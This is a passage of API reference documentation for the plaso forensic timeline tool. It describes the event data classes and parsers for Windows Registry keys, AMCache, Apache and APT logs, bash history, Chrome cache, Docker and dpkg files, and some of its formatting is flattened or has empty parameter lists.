entriesRun/RunOnce entries.

Type str


Type str

DATA_TYPE = 'windows:registry:run'

plaso.parsers.winreg_plugins.sam_users module

“Windows Registry plugin for SAM Users Account information.

class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventDataBases: plaso.containers.events.EventData

Class that defines SAM users Windows Registry event data.

account_ridaccount relative identifier (RID).

Type int

commentscomments.

Type str

fullnamefull name.


http://msdn.microsoft.com/en-us/library/aa376977(v=vs.85).aspx


Type str


Type str

login_countlogin count.

Type int

usernamea string containing the username.

Type str

DATA_TYPE = 'windows:registry:sam_users'

class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Windows Registry plugin for SAM Users Account information.

DATA_FORMAT = 'Security Accounts Manager (SAM) users Registry data'


Parameters




NAME = 'windows_sam_users'

plaso.parsers.winreg_plugins.services module

Windows drivers and services Registry key parser plugin.

class plaso.parsers.winreg_plugins.services.ServicesPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Plug-in to format the Services and Drivers keys having Type and Start.

Also see: http://support.microsoft.com/kb/103000

DATA_FORMAT = 'Windows drivers and services Registry data'


Parameters



FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter object>})



http://support.microsoft.com/kb/103000


class plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventDataBases: plaso.containers.events.EventData

Windows Registry driver or service event data attribute container.

error_controlerror control value of the Windows driver or service executable.

Type int

image_pathpath of the Windows driver or service executable.

Type str


Type str

namename of the Windows driver or service.

Type str

object_nameWindows service object name.

Type str

service_dllWindows service DLL.

Type str

service_typeWindows driver or service type.

Type int

start_typeDevice or service start type.

Type int

valuesnames and data of additional values in the key.

Type str

DATA_TYPE = 'windows:registry:service'

plaso.parsers.winreg_plugins.shutdown module

Windows Registry plugin for parsing the last shutdown time of a system.

class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryEventDataBases: plaso.containers.events.EventData

Shutdown Windows Registry event data.


Type str



value_namename of the Windows Registry value.

Type str

DATA_TYPE = 'windows:registry:shutdown'

class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Windows Registry plugin for parsing the last shutdown time of a system.

DATA_FORMAT = 'Windows last shutdown Registry data'

ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a ShutdownTime Windows Registry value.

Parameters




NAME = 'windows_shutdown'

plaso.parsers.winreg_plugins.task_scheduler module

This file contains the Task Scheduler Registry keys plugins.

class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheEventDataBases: plaso.containers.events.EventData

Task Cache event data.


Type str

task_namename of the task.

Type str

task_identifieridentifier of the task.

Type str

DATA_TYPE = 'task_scheduler:task_cache:entry'

class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Plugin that parses a Task Cache key.

DATA_FORMAT = 'Windows Task Scheduler cache Registry data'


Parameters






NAME = 'windows_task_cache'

plaso.parsers.winreg_plugins.terminal_server module

This file contains the Terminal Server client Windows Registry plugins.

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientConnectionEventDataBases: plaso.containers.events.EventData

Terminal Server client connection event data attribute container.


Type str


Type str

usernameusername, provided by the UsernameHint value.

Type str

DATA_TYPE = 'windows:registry:mstsc:connection'

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUEventDataBases: plaso.containers.events.EventData

Terminal Server client MRU event data attribute container.


Type str


Type str

DATA_TYPE = 'windows:registry:mstsc:mru'

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for Terminal Server Client Connection MRUs keys.

DATA_FORMAT = 'Terminal Server Client Most Recently Used (MRU) Registry data'

ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a Terminal Server Client MRU Windows Registry key.

Parameters






NAME = 'mstsc_rdp_mru'

class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for Terminal Server Client Connection keys.

DATA_FORMAT = 'Terminal Server Client Connection Registry data'

ExtractEvents(parser_mediator, registry_key, **kwargs)Extracts events from a Terminal Server Client Windows Registry key.

Parameters




NAME = 'mstsc_rdp'

plaso.parsers.winreg_plugins.timezone module

Plug-in to collect information about the Windows timezone settings.

class plaso.parsers.winreg_plugins.timezone.WinRegTimezonePluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Plug-in to collect information about the Windows timezone settings.

DATA_FORMAT = 'Windows time zone Registry data'


Parameters




NAME = 'windows_timezone'

class plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventDataBases: plaso.containers.events.EventData

Timezone settings event data attribute container.

configurationtimezone configuration.

Type str




Type str

DATA_TYPE = 'windows:registry:timezone'

plaso.parsers.winreg_plugins.typedurls module

File containing a Windows Registry plugin to parse the typed URLs key.

class plaso.parsers.winreg_plugins.typedurls.TypedURLsEventDataBases: plaso.containers.events.EventData

Typed URLs event data attribute container.

entriestyped URLs or paths entries.

Type str


Type str

DATA_TYPE = 'windows:registry:typedurls'

class plaso.parsers.winreg_plugins.typedurls.TypedURLsPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

A Windows Registry plugin for typed URLs history.

DATA_FORMAT = 'Windows Explorer typed URLs Registry data'


Parameters




NAME = 'windows_typed_urls'

plaso.parsers.winreg_plugins.usb module

File containing a Windows Registry plugin to parse the USB Device key.

class plaso.parsers.winreg_plugins.usb.USBPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

USB Windows Registry plugin for last connection time.

Also see: https://msdn.microsoft.com/en-us/library/windows/hardware/jj649944%28v=vs.85%29.aspx

DATA_FORMAT = 'Windows USB device Registry data'


https://msdn.microsoft.com/en-us/library/windows/hardware/jj649944%28v=vs.85%29.aspx



Parameters




NAME = 'windows_usb_devices'

class plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventDataBases: plaso.containers.events.EventData

Windows USB device event data attribute container.


Type str

productproduct of the USB device.

Type str

serialserial number of the USB device.

Type str

subkey_namename of the Windows Registry subkey.

Type str

vendorvendor of the USB device.

Type str

DATA_TYPE = 'windows:registry:usb'

plaso.parsers.winreg_plugins.usbstor module

File containing a Windows Registry plugin to parse the USBStor key.

class plaso.parsers.winreg_plugins.usbstor.USBStorEventDataBases: plaso.containers.events.EventData

USBStor event data attribute container.

device_typetype of USB device.

Type str

display_namedisplay name of the USB device.

Type str




Type str

parent_id_prefixparent identifier prefix of the USB device.

Type str

productproduct of the USB device.

Type str

serialserial number of the USB device.

Type str

revisionrevision number of the USB device.

Type str

subkey_namename of the Windows Registry subkey.

Type str

vendorvendor of the USB device.

Type str

DATA_TYPE = 'windows:registry:usbstor'

class plaso.parsers.winreg_plugins.usbstor.USBStorPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

USBStor key plugin.

Also see: https://forensicswiki.xyz/wiki/index.php?title=USB_History_Viewing

DATA_FORMAT = 'Windows USB Plug And Play Manager USBStor Registry data'


Parameters




NAME = 'windows_usbstor_devices'


https://forensicswiki.xyz/wiki/index.php?title=USB_History_Viewing


plaso.parsers.winreg_plugins.userassist module

The UserAssist Windows Registry plugin.

class plaso.parsers.winreg_plugins.userassist.UserAssistPluginBases: plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

Plugin that parses an UserAssist key.

Also see: http://blog.didierstevens.com/programs/userassist/ https://code.google.com/p/winreg-kb/wiki/UserAssistKeys http://intotheboxes.files.wordpress.com/2010/04/intotheboxes_2010_q1.pdf

DATA_FORMAT = 'User Assist Registry data'


Parameters



FILTERS = frozenset({<plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter object>})

NAME = 'userassist'

class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataBases: plaso.containers.events.EventData

UserAssist Windows Registry event data.

application_focus_countapplication focus count.

Type int

application_focus_durationapplication focus duration.

Type int

entry_indexentry index.

Type int


Type str

number_of_executionsnubmer of executions.

Type int

value_namename of the Windows Registry value.

Type str

DATA_TYPE = 'windows:registry:userassist'


http://blog.didierstevens.com/programs/userassist/

https://code.google.com/p/winreg-kb/wiki/UserAssistKeys

https://code.google.com/p/winreg-kb/wiki/UserAssistKeys

http://intotheboxes.files.wordpress.com/2010/04/intotheboxes_2010_q1.pdf


class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter(user_assist_guid)Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter

UserAssist Windows Registry key path filter.

plaso.parsers.winreg_plugins.windows_version module

Plug-in to collect information about the Windows version.

class plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventDataBases: plaso.containers.events.EventData

Windows installation event data attribute container.

build_numberWindows build number.

Type str


Type str

ownerregistered owner.

Type str

product_nameproduct name.

Type str

service_packservice pack.

Type str

versionWindows version.

Type str

DATA_TYPE = 'windows:registry:installation'

class plaso.parsers.winreg_plugins.windows_version.WindowsVersionPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Plug-in to collect information about the Windows version.

DATA_FORMAT = 'Windows version (product) Registry data'


Parameters






NAME = 'windows_version'

plaso.parsers.winreg_plugins.winlogon module

This file contains the Winlogon Registry plugin.

class plaso.parsers.winreg_plugins.winlogon.WinlogonEventDataBases: plaso.containers.events.EventData

Winlogon event data attribute container.

applicationWinlogon application.

Type str

commandWinlogon command.

Type str

handlerWinlogon handler.

Type str


Type str

triggerWinlogon trigger.

Type str

DATA_TYPE = 'windows:registry:winlogon'

class plaso.parsers.winreg_plugins.winlogon.WinlogonPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for parsing the Winlogon key.

DATA_FORMAT = 'Windows log-on Registry data'


Parameters




NAME = 'winlogon'



plaso.parsers.winreg_plugins.winrar module

This file contains a WinRAR history Windows Registry plugin.

class plaso.parsers.winreg_plugins.winrar.WinRARHistoryEventDataBases: plaso.containers.events.EventData

WinRAR history event data attribute container.

entriesarchive history entries.

Type str


Type str

DATA_TYPE = 'winrar:history'

class plaso.parsers.winreg_plugins.winrar.WinRARHistoryPluginBases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin

Windows Registry plugin for parsing WinRAR History keys.

DATA_FORMAT = 'WinRAR History Registry data'


Parameters



FILTERS = frozenset({<plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>, <plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter object>})

NAME = 'winrar_mru'

Module contents

Imports for the Windows Registry parser.

Submodules

plaso.parsers.amcache module

File containing a Windows Registry plugin to parse the AMCache.hve file.

class plaso.parsers.amcache.AMCacheFileEventDataBases: plaso.containers.events.EventData

AMCache file event data.

company_namecompany name that created product file belongs to.

Type str



file_descriptiondescription of file.

Type str

file_referencefile system file reference, for example 9-1 (MFT entry - sequence number).

Type str

file_sizesize of file in bytes.

Type int

file_versionversion of file.

Type str

full_pathfull path of file.

Type str

language_codelanguage code of file.

Type int

product_nameproduct name file belongs to.

Type str

program_identifierGUID of entry under Root/Program key file belongs to.

Type str

sha1SHA-1 of file.

Type str

DATA_TYPE = 'windows:registry:amcache'

class plaso.parsers.amcache.AMCacheParserBases: plaso.parsers.interface.FileObjectParser

AMCache Registry plugin for recently run programs.

DATA_FORMAT = 'AMCache Windows NT Registry (AMCache.hve) file'

NAME = 'amcache'

ParseFileObject(parser_mediator, file_object)Parses an AMCache.hve file-like object for events.

Parameters


• file_object (dfvfs.FileIO) – file-like object.



class plaso.parsers.amcache.AMCacheProgramEventDataBases: plaso.containers.events.EventData

AMCache programs event data.

entry_typetype of entry (usually AddRemoveProgram).

Type str

file_pathsfile paths of installed program.

Type str

fileslist of files belonging to program.

Type str

language_codelanguage_code of program.

Type int

msi_package_codeMSI package code of program.

Type str

msi_product_codeMSI product code of program.

Type str

namename of installed program.

Type str

package_codepackage code of program.

Type str

product_codeproduct code of program.

Type str

publisherpublisher of program.

Type str

uninstall_keyunicode string of uninstall registry key for program.

Type str

versionversion of program.

Type str

DATA_TYPE = 'windows:registry:amcache:programs'



plaso.parsers.android_app_usage module

Parser for the Android usage history (usage-history.xml) files.

class plaso.parsers.android_app_usage.AndroidAppUsageEventDataBases: plaso.containers.events.EventData

Android application usage event data.

packagename of the Android application.

Type str

componentname of the individual component of the application.

Type str

DATA_TYPE = 'android:event:last_resume_time'

class plaso.parsers.android_app_usage.AndroidAppUsageParserBases: plaso.parsers.interface.FileObjectParser

Parses the Android usage history (usage-history.xml) file.

DATA_FORMAT = 'Android usage history (usage-history.xml) file'

NAME = 'android_app_usage'

ParseFileObject(parser_mediator, file_object)Parses an Android usage-history file-like object.

Parameters




plaso.parsers.apache_access module

Apache access log (access.log) file parser.

Parser based on the two default apache formats, common and combined log format defined in https://httpd.apache.org/docs/2.4/logs.html

class plaso.parsers.apache_access.ApacheAccessEventDataBases: plaso.containers.events.EventData

Apache access event data.

http_request_refererhttp request referer header information.

Type str

http_requestfirst line of http request.

Type str


https://httpd.apache.org/docs/2.4/logs.html

https://httpd.apache.org/docs/2.4/logs.html


http_request_user_agenthttp request user agent header information.

Type str

http_response_byteshttp response bytes size without headers.

Type int

http_response_codehttp response code from server.

Type int

ip_addressIPv4 or IPv6 addresses.

Type str

port_numbercanonical port of the server serving the request.

Type int

remote_nameremote logname (from identd, if supplied).

Type str

server_namecanonical hostname of the server serving the request.

Type str

user_namelogged user name.

Type str

DATA_TYPE = 'apache:access'

class plaso.parsers.apache_access.ApacheAccessParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Apache access log (access.log) file parser.

DATA_FORMAT = 'Apache access log (access.log) file'

LINE_STRUCTURES = [('combined_log_format', {{{{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd}), ('common_log_format', {{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} lineEnd}), ('vhost_combined_log_format', {{{{{{{{{{{{W:(ABCD...) Suppress:(":")} W:(0123...)} {IPv4 address | IPv6 address}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd})]

MAX_LINE_LENGTH = 2048

NAME = 'apache_access'

ParseRecord(parser_mediator, key, structure)Parses a matching entry.

Parameters



• structure (pyparsing.ParseResults) – elements parsed from the file.

Raises ParseError – when the structure type is unknown.



VerifyStructure(parser_mediator, line)Verifies that this is an apache access log file.

Parameters


• line (str) – line from the text file.

Returns True if this is the correct parser, False otherwise.

Return type bool

plaso.parsers.apt_history module

Parser for Advanced Packaging Tool (APT) History log files.

class plaso.parsers.apt_history.APTHistoryLogEventDataBases: plaso.containers.events.EventData

APT History log event data.

commandcommand exectued

Type str

errorreported error.

Type str

packageslist of packages being affected.

Type str

requesteruser requesting the activity.

Type str

DATA_TYPE = 'apt:history:line'

class plaso.parsers.apt_history.APTHistoryLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses for Advanced Packaging Tool (APT) History log files.

DATA_FORMAT = 'Advanced Packaging Tool (APT) History log file'

LINE_STRUCTURES = [('record_start', {{{[lineEnd]... "Start-Date:"} Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})} lineEnd}), ('record_body', {{"Commandline:" | "Downgrade:" | "Error:" | "Install:" | "Purge:" | "Remove:" | "Requested-By:" | "Upgrade:"} rest of line}), ('record_end', {{"End-Date:" Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})} {lineEnd}...})]


NAME = 'apt_history'

ParseRecord(parser_mediator, key, structure)Parses a log record structure and produces events.

Parameters




• key (str) – identifier of the structure of tokens.

• structure (pyparsing.ParseResults) – structure of tokens derived from a logentry.


VerifyStructure(parser_mediator, line)Verify that this file is an APT History log file.

Parameters


• line (str) – single line from the text file.


Return type bool

plaso.parsers.asl module

The Apple System Log (ASL) file parser.

class plaso.parsers.asl.ASLEventDataBases: plaso.containers.events.EventData

Apple System Log (ASL) event data.

computer_namename of the host.

Type str

extra_informationextra fields associated to the event.

Type str

facilityfacility.

Type str

group_idgroup identifier (GID).

Type int

levellevel of criticality of the event.

Type str

message_idmessage identifier.

Type int

messagemessage of the event.

Type str




Type int

read_uiduser identifier that can read this file, where -1 represents all.

Type int

read_gidthe group identifier that can read this file, where -1 represents all.

Type int

record_positionposition of the event record.

Type int

sendersender or process that created the event.

Type str

user_siduser identifier (UID).

Type str

DATA_TYPE = 'mac:asl:event'

class plaso.parsers.asl.ASLParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for Apple System Log (ASL) files.

DATA_FORMAT = 'Apple System Log (ASL) file'

classmethod GetFormatSpecification()Retrieves the format specification.



NAME = 'asl_log'

ParseFileObject(parser_mediator, file_object)Parses an ASL file-like object.

Parameters






plaso.parsers.bash_history module

Parser for bash history files.

class plaso.parsers.bash_history.BashHistoryEventDataBases: plaso.containers.events.EventData

Bash history log event data.

commandcommand that was executed.

Type str

DATA_TYPE = 'bash:history:command'

class plaso.parsers.bash_history.BashHistoryParserBases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

Parses events from Bash history files.

DATA_FORMAT = 'Bash history file'

LINE_STRUCTURES = [('log_entry', {{{Suppress:("#") W:(0123...)} Re:('.*?(?=($|\\n#\\d{10}))')} lineEnd})]

NAME = 'bash_history'

ParseRecord(parser_mediator, key, structure)Parses a record and produces a Bash history event.

Parameters





VerifyStructure(parser_mediator, lines)Verifies that this is a bash history file.

Parameters


• lines (str) – one or more lines from the text file.


Return type bool



plaso.parsers.bencode_parser module

Parser for bencoded files.

class plaso.parsers.bencode_parser.BencodeParserBases: plaso.parsers.interface.FileObjectParser

Parser for bencoded files.

The Plaso engine calls parsers by their Parse() method. The Parse() function deserializes bencoded files using theBitTorrent-bencode library and calls plugins (BencodePlugin) registered through the interface by their Process()to produce event objects.

Plugins are how this parser understands the content inside a bencoded file, each plugin holds logic specificto a particular bencoded file. See the bencode_plugins / directory for examples of how bencode plugins areimplemented.

DATA_FORMAT = 'Bencoded file'

NAME = 'bencode'

ParseFileObject(parser_mediator, file_object)Parses a bencoded file-like object.

Parameters


• file_object (dfvfs.FileIO) – a file-like object.


plaso.parsers.bsm module

Basic Security Module (BSM) event auditing file parser.

class plaso.parsers.bsm.BSMEventDataBases: plaso.containers.events.EventData

Basic Security Module (BSM) audit event data.

event_typeidentifier that represents the type of the event.

Type int

extra_tokensevent extra tokens, which is a list of dictionaries that contain: {token type: {token values}}

Type list[dict[str, dict[str, str]]]

record_lengthrecord length in bytes (trailer number).

Type int

return_valueprocessed return value and exit status.

Type str

DATA_TYPE = 'bsm:event'



class plaso.parsers.bsm.BSMParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for Basic Security Module (BSM) event auditing files.

DATA_FORMAT = 'Basic Security Module (BSM) event auditing file'

NAME = 'bsm_log'

ParseFileObject(parser_mediator, file_object)Parses a BSM file-like object.

Parameters




plaso.parsers.chrome_cache module

Parser for Google Chrome and Chromium Cache files.

class plaso.parsers.chrome_cache.CacheAddress(cache_address)Bases: object

Chrome cache address.

block_numberblock data file number.

Type int

block_offsetoffset within the block data file.

Type int

block_sizeblock size.

Type int

filenamename of the block data file.

Type str

valuecache address.

Type int

FILE_TYPE_BLOCK_1024 = 3



FILE_TYPE_BLOCK_RANKINGS = 1

FILE_TYPE_SEPARATE = 0



class plaso.parsers.chrome_cache.CacheEntryBases: object

Chrome cache entry.

creation_timecreation time, in number of microseconds since since January 1, 1601, 00:00:00 UTC.

Type int

hashsuper fast hash of the key.

Type int

keykey.

Type bytes

nextcache address of the next cache entry.

Type int

original_urloriginal URL derived from the key.

Type str

rankings_nodecache address of the rankings node.

Type int

class plaso.parsers.chrome_cache.ChromeCacheDataBlockFileParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Chrome cache data block file parser.

ParseCacheEntry(file_object, block_offset)Parses a cache entry.

Parameters

• file_object (dfvfs.FileIO) – a file-like object to read from.

• block_offset (int) – block offset of the cache entry.

Returns cache entry.

Return type CacheEntry

Raises ParseError – if the cache entry cannot be read.

ParseFileObject(parser_mediator, file_object)Parses a file-like object.

Parameters

• parser_mediator (ParserMediator) – a parser mediator.

• file_object (dfvfs.FileIO) – a file-like object to parse.

Raises ParseError – when the file cannot be parsed.



class plaso.parsers.chrome_cache.ChromeCacheEntryEventDataBases: plaso.containers.events.EventData

Chrome Cache event data.

original_urloriginal URL.

Type str

DATA_TYPE = 'chrome:cache:entry'

class plaso.parsers.chrome_cache.ChromeCacheIndexFileParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Chrome cache index file parser.

creation_timecreation time, in number of number of microseconds since January 1, 1601, 00:00:00 UTC.

Type int

index_tablethe cache addresses which are stored in the index file.

Type list[CacheAddress]

ParseFileObject(parser_mediator, file_object)Parses a file-like object.

Parameters



Raises ParseError – when the file cannot be parsed.

class plaso.parsers.chrome_cache.ChromeCacheParserBases: plaso.parsers.interface.FileEntryParser

Parses Chrome Cache files.

DATA_FORMAT = 'Google Chrome or Chromium Cache file'

NAME = 'chrome_cache'

ParseFileEntry(parser_mediator, file_entry)Parses Chrome Cache files.

Parameters






plaso.parsers.chrome_preferences module

A parser for the Chrome preferences file.

class plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventDataBases: plaso.containers.events.EventData

Chrome content settings exceptions event data.

permissionpermission.

Type str

primary_urlprimary URL.

Type str

secondary_urlsecondary URL.

Type str

DATA_TYPE = 'chrome:preferences:content_settings:exceptions'

class plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventDataBases: plaso.containers.events.EventData

Chrome Extension event data.

extension_idextension identifier.

Type str

extension_nameextension name.

Type str

pathpath.

Type str

DATA_TYPE = 'chrome:preferences:extension_installation'

class plaso.parsers.chrome_preferences.ChromeExtensionsAutoupdaterEventDataBases: plaso.containers.events.EventData

Chrome Extension Autoupdater event data.

messagemessage.

Type str

DATA_TYPE = 'chrome:preferences:extensions_autoupdater'

class plaso.parsers.chrome_preferences.ChromePreferencesClearHistoryEventDataBases: plaso.containers.events.EventData

Chrome history clearing event data.

messagemessage.



Type str

DATA_TYPE = 'chrome:preferences:clear_history'

class plaso.parsers.chrome_preferences.ChromePreferencesParserBases: plaso.parsers.interface.FileObjectParser

Parses Chrome Preferences files.

DATA_FORMAT = 'Google Chrome Preferences file'

NAME = 'chrome_preferences'

ParseFileObject(parser_mediator, file_object)Parses a Chrome preferences file-like object.

Parameters




REQUIRED_KEYS = frozenset({'browser', 'extensions'})

plaso.parsers.cups_ipp module

The CUPS IPP files parser.

CUPS IPP version 1.0: * https://tools.ietf.org/html/rfc2565 * https://tools.ietf.org/html/rfc2566 * https://tools.ietf.org/html/rfc2567 * https://tools.ietf.org/html/rfc2568 * https://tools.ietf.org/html/rfc2569 * https://tools.ietf.org/html/rfc2639

CUPS IPP version 1.1: * https://tools.ietf.org/html/rfc2910 * https://tools.ietf.org/html/rfc2911 * https://tools.ietf.org/html/rfc3196 * https://tools.ietf.org/html/rfc3510

CUPS IPP version 2.0: * N/A

class plaso.parsers.cups_ipp.CupsIppEventDataBases: plaso.containers.events.EventData

CUPS IPP event data.

applicationapplication that prints the document.

Type str

computer_namename of the computer.

Type str

copiesnumber of copies.

Type int

doc_typetype of document.

Type str


https://tools.ietf.org/html/rfc2565














job_idjob identifier.

Type str

job_namejob name.

Type str

ownerreal name of the user.

Type str

printer_ididentification name of the print.

Type str

uriURL of the CUPS service.

Type str

usersystem user name.

Type str

DATA_TYPE = 'cups:ipp:event'

class plaso.parsers.cups_ipp.CupsIppParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for CUPS IPP files.

DATA_FORMAT = 'CUPS IPP file'

NAME = 'cups_ipp'

ParseFileObject(parser_mediator, file_object)Parses a CUPS IPP file-like object.

Parameters




plaso.parsers.custom_destinations module

Parser for custom destinations jump list (.customDestinations-ms) files.

class plaso.parsers.custom_destinations.CustomDestinationsParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parses custom destinations jump list (.customDestinations-ms) files.

DATA_FORMAT = 'Custom destinations jump list (.customDestinations-ms) file'






NAME = 'custom_destinations'

ParseFileObject(parser_mediator, file_object)Parses a .customDestinations-ms file-like object.

Parameters




plaso.parsers.czip module

This file contains a parser for compound ZIP files.

class plaso.parsers.czip.CompoundZIPParserBases: plaso.parsers.interface.FileObjectParser

Shared functionality for parsing compound zip files.

Compound zip files are zip files used as containers to create another file format, as opposed to archives ofunrelated files.

DATA_FORMAT = 'Compound ZIP file'

NAME = 'czip'

ParseFileObject(parser_mediator, file_object)Parses a compound ZIP file-like object.

Parameters




plaso.parsers.docker module

Parser for Docker configuration and log files.

class plaso.parsers.docker.DockerJSONContainerEventDataBases: plaso.containers.events.EventData

Docker container configuration event data.

actionwhether the container was created, started, or finished.

Type str

container_ididentifier of the container (SHA256).

Type str



container_namename of the container.

Type str

DATA_TYPE = 'docker:json:container'

class plaso.parsers.docker.DockerJSONContainerLogEventDataBases: plaso.containers.events.EventData

Docker container’s log event data.

container_ididentifier of the container (sha256).

Type str

log_linelog line.

Type str

log_sourcelog source.

Type str

DATA_TYPE = 'docker:json:container:log'

class plaso.parsers.docker.DockerJSONLayerEventDataBases: plaso.containers.events.EventData

Docker file system layer configuration event data.

commandthe command used which made Docker create a new layer.

layer_idthe identifier of the current Docker layer (SHA-1).

DATA_TYPE = 'docker:json:layer'

class plaso.parsers.docker.DockerJSONParserBases: plaso.parsers.interface.FileObjectParser

Parser for Docker json configuration and log files.

This handles : * Per container config file

DOCKER_DIR/containers/<container_id>/config.json

• Per container stdout/stderr output log DOCKER_DIR/containers/<container_id>/<container_id>-json.log

• Filesystem layer config files DOCKER_DIR/graph/<layer_id>/json

DATA_FORMAT = 'Docker configuration and log JSON file'

NAME = 'dockerjson'

ParseFileObject(parser_mediator, file_object)Parses various Docker configuration and log files in JSON format.

This methods checks whether the file_object points to a docker JSON config or log file, and calls thecorresponding _Parse* function to generate Events.

Parameters





Raises

• UnableToParseFile – when the file cannot be parsed.

• ValueError – if the JSON file cannot be decoded.

plaso.parsers.dpkg module

Parser for Debian package manager log (dpkg.log) files.

Information updated 02 September 2016.

An example:

2016-08-03 15:25:53 install base-passwd:amd64 <none> 3.5.33

Log messages are of the form:

YYYY-MM-DD HH:MM:SS startup type command Where type is:

archives (with a command of unpack or install) packages (with a command of configure, triggers-only,remove or purge)

YYYY-MM-DD HH:MM:SS status state pkg installed-version

